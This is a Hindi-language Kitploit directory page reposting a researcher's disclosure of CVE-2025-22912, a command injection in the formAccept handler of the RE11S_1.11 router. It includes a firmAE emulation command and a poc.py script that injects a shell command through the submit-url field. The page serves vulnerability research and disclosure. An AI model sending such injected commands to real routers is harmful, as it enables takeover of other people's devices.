Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
RE11S_1.11-formAccept-CommandInjection — CVE-2025-22912 | Kitploit
उपकरण/GitHubGitHub/passwa11/re11s_1.11-formaccept-commandinjection
एम्बेडेड सिस्टम सुरक्षाIoT सुरक्षाभेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणफज़िंगपेनिट्रेशन टेस्टिंगकमांड एंड कंट्रोल

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें
GitHub
passwa11/re11s_1.11-formaccept-commandinjection

RE11S_1.11-formAccept-CommandInjection

CVE-2025-22912

रिपॉजिटरी देखें
1 साल पहलेअभी तक समीक्षित नहीं

RE11S_1.11-formAccept-CommandInjection

क्यूई एन शिन तियांगोंग लैब में अपनी इंटर्नशिप के दौरान, मैंने RE11S_1.11 राउटर में एक कमांड इंजेक्शन भेद्यता की खोज की।

bin निर्देशिका में webs फ़ाइल का विश्लेषण करके, मैंने पाया कि formAccept फ़ंक्शन में एक कमांड इंजेक्शन भेद्यता है।

कमांड इंजेक्शन को submit-url कुंजी मान द्वारा ट्रिगर किया जा सकता है, जो सिस्टम कमांड इंजेक्शन की ओर ले जाता है।

image-20241224100434040

हम राउटर का अनुकरण कैसे कर सकते हैं

firmAE के साथ अनुकरण करने के लिए निम्नलिखित कमांड का उपयोग करें।

root@kitploit:~
sudo ./run.sh -r v1 ~/IOT/RE11S_1.11/RE11S_1.11.bin

poc.py फ़ाइल की सामग्री इस प्रकार है:

root@kitploit:~
import requests

url = "http://192.168.9.2/goform/formAccept"
data = {
	"submit-url":"touch /tmp/xyq"
}

r = requests.post(url,data=data)
print(r.text)

हमले का परिणाम

image-20241224100515030

यह देखा जा सकता है कि निष्पादन के बाद एक /tmp/xyq फ़ाइल जोड़ी गई है, जो साबित करता है कि हमला सफल है।

टूल डाउनलोड करें